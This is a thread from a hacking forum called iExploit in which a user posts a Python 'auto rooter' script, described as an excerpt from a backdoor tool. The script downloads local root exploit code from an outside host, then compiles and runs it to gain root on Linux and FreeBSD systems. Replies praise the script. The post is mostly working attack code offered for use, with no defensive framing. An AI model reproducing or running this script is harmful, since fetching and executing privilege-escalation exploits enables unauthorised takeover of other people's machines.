iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Auto rooter
  • chroniccommand
    Posts: 1,389
    Here is a simple Python script I wrote that attempts some local root exploits on a system to try and get root. It's a snippet from pyBackdoor so it doesn't have that many root exploits right now. pyBackdoor will have more.


    #!/usr/bin/env python
    '''
    Auto rooter in Python
    Very simple
    Excerpt from pyBackdoor v 2.0
    '''
    import urllib, os
    print(\"Pick your local root exploit:\")
    print(\"\"\"
        1 => h00lyshit - 2.6.x
        2 => pwned - 2.4 and 2.6 sys_uselib exploit
        3 => w00t - FreeBSD 8.0 local root
        4 => Exit
                \"\"\")
    choice = raw_input(\"Choice: \")
    if choice == '1':
        exploiturl = 'http://poison.teamxpc.com/localroot/h00lyshit.c'
        try:
            exploit = urllib.urlopen(exploiturl)
            localroot = open(exploiturl.split('/')[-1], 'w')
            localroot.write(exploit.read())
            localroot.close()
            exploit.close()
        except:
            print(\"Could not download exploit\")
        try:
            print(\"Creating 2GB file for h00lyshit...\")
            os.system(\"dd if=/dev/zero of=2gbfile bs=2048 count=2097152\")
            os.system(\"gcc -o h00lyshit h00lyshit.c\")
            os.system(\"./h00lyshit 2gbfile\")
            uid = os.getuid()
            if uid == 0:
                print(\"[+]Root aquired!\")
            else:
                print(\"[-]Exploit failed\")
        except:
            print(\"Error executing exploit\")
    elif choice == '2':
        exploiturl = 'http://poison.teamxpc.com/localroot/pwned.c'
        try:
            exploit = urllib.urlopen(exploiturl)
            localroot = open(exploiturl.split('/')[-1], 'w')
            localroot.write(exploit.read())
            localroot.close()
            exploit.close()
        except:
            print(\"Could not download exploit\")
        try:
            os.system(\"gcc -o pwned pwned.c\")
            os.system(\"./pwned\")
            uid = os.getuid()
            if uid == 0:
                print(\"[+]Root aquired!\")
            else:
                print(\"[-]Exploit failed\")
        except:
            print(\"Error executing exploit\")
    elif choice == '3':
        exploiturl = 'http://poison.teamxpc.com/localroot/w00t.sh'
        try:
            exploit = urllib.urlopen(exploiturl)
            localroot = open(exploiturl.split('/')[-1], 'w')
            localroot.write(exploit.read())
            localroot.close()
            exploit.close()
        except:
            print(\"Could not download exploit\")
        try:
            os.system(\"sh w00t.sh\")
            uid = os.getuid()
            if uid == 0:
                print(\"[+]Root aquired!\")
            else:
                print(\"[-]Exploit failed\")
        except:
            print(\"Error executing exploit\")
  • Xin
    Posts: 3,251
    Nice glad you managed to do it with the urllib.
    Xin
  • chroniccommand
    Posts: 1,389
    said:


    Nice glad you managed to do it with the urllib.



    Yep thanks. I'll incorporate more exploits soon.
Add a Comment